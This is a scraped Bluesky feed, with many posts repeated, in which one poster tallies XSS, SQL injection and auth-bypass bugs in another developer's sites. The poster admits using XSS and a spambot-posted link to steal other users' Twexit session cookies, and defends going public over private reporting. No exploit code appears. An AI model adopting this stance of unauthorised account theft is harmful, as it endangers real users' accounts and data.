#1 skybucks millionaire
@richardwrites672.bsky.social
adrianus websites try not to have every vulnerability type challenge
adrianus count: 4 xss (technically 5 if you count the firstpost xss), 10 sqli
non-adrianus count: 15 xss, 6 sqli, 1 hamburger, 5 auth bypass, 10+ "chatDisabled":true
https://6v.pages.dev
adrianus count: 4 xss (technically 5 if you count the firstpost xss), 10 sqli
non-adrianus count: 15 xss, 6 sqli, 1 hamburger, 5 auth bypass, 10+ "chatDisabled":true
https://6v.pages.dev
the site has come back up, and vulnerabilities that used to be fixed are now no longer fixed for some reason so there's even more ways to steal twexit accs now compared to when he shut the site down
August 12, 2024 at 8:17 PM
the site has come back up, and vulnerabilities that used to be fixed are now no longer fixed for some reason so there's even more ways to steal twexit accs now compared to when he shut the site down
i found multiple xss bugs just about daily (so i could steal the twexit cookies of anyone who clicked on the twexit link i had a spambot post), and then retr0id (and later me) found some sql injection bugs and adrianus shut the site down
August 12, 2024 at 8:15 PM
i found multiple xss bugs just about daily (so i could steal the twexit cookies of anyone who clicked on the twexit link i had a spambot post), and then retr0id (and later me) found some sql injection bugs and adrianus shut the site down
It is an adrianus project, yes. The domains (mastochist.com and mastochist.nl ) don't resolve but you can still access it by setting an /etc/hosts entry with the IP of the twexit server.
December 26, 2023 at 6:02 AM
It is an adrianus project, yes. The domains (mastochist.com and mastochist.nl ) don't resolve but you can still access it by setting an /etc/hosts entry with the IP of the twexit server.
To make my point clearer:
If I had just reported the bugs to you, nothing would have changed. There would be more bugs to take their place, and people who didn't want to make it as public as I did would have taken advantage of them. It's likely some already have.
Instead, your websites are down.
If I had just reported the bugs to you, nothing would have changed. There would be more bugs to take their place, and people who didn't want to make it as public as I did would have taken advantage of them. It's likely some already have.
Instead, your websites are down.
December 25, 2023 at 1:06 AM
To make my point clearer:
If I had just reported the bugs to you, nothing would have changed. There would be more bugs to take their place, and people who didn't want to make it as public as I did would have taken advantage of them. It's likely some already have.
Instead, your websites are down.
If I had just reported the bugs to you, nothing would have changed. There would be more bugs to take their place, and people who didn't want to make it as public as I did would have taken advantage of them. It's likely some already have.
Instead, your websites are down.
Because given your other posts about how having common bugs in your app "ruined your reputation", I doubt it.
Do you think no one took advantage of the SQL injection vulnerabilities present in your older project Twopcharts? Because I heavily doubt that as well.
Do you think no one took advantage of the SQL injection vulnerabilities present in your older project Twopcharts? Because I heavily doubt that as well.
December 25, 2023 at 12:42 AM
Because given your other posts about how having common bugs in your app "ruined your reputation", I doubt it.
Do you think no one took advantage of the SQL injection vulnerabilities present in your older project Twopcharts? Because I heavily doubt that as well.
Do you think no one took advantage of the SQL injection vulnerabilities present in your older project Twopcharts? Because I heavily doubt that as well.
I've never tried to frame my actions as being "absolutely fine" and I'm not sure why you're attempting to say that.
I do want to ask you: If I had just privately reported the issues to you, would you have made people aware that their information was at risk from using your service?
I do want to ask you: If I had just privately reported the issues to you, would you have made people aware that their information was at risk from using your service?
December 25, 2023 at 12:41 AM
I've never tried to frame my actions as being "absolutely fine" and I'm not sure why you're attempting to say that.
I do want to ask you: If I had just privately reported the issues to you, would you have made people aware that their information was at risk from using your service?
I do want to ask you: If I had just privately reported the issues to you, would you have made people aware that their information was at risk from using your service?
Emails and bluesky login tokens were out in the open though, which absolutely is a real concern.
December 24, 2023 at 7:20 PM
Emails and bluesky login tokens were out in the open though, which absolutely is a real concern.
The main issue with this one is that it's injection into an order by/limit query, and the only exploitation strategy I could find for it was very restrictive and seemingly didn't allow for select statements.
I've found a (potentially) better sqli method that I'm still investigating though.
I've found a (potentially) better sqli method that I'm still investigating though.
December 22, 2023 at 2:46 PM
The main issue with this one is that it's injection into an order by/limit query, and the only exploitation strategy I could find for it was very restrictive and seemingly didn't allow for select statements.
I've found a (potentially) better sqli method that I'm still investigating though.
I've found a (potentially) better sqli method that I'm still investigating though.